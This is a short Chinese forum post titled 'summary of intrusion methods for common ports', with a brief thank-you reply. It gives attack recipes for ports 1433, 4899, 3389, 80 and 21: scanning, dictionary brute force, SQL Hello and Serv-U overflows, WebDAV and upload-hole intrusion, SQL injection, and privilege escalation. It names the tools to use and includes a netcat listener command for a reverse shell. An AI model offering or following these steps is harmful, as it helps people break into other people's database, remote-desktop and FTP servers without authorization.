【常见端口的入侵手法归纳】
1. 1433端口 入侵scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe 入侵
=============================
对sql的sp2及以下的系统,可用sql的hello 溢出 漏洞 入侵 。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵 ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵 ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的 溢出 (win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs 论坛 ,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行 注入 。(小榕的 注入 软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用 溢出 入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
**** Hidden Message *****
谢谢分享!~ RE: 【常见端口的入侵手法归纳】 [修改]
页:
[1]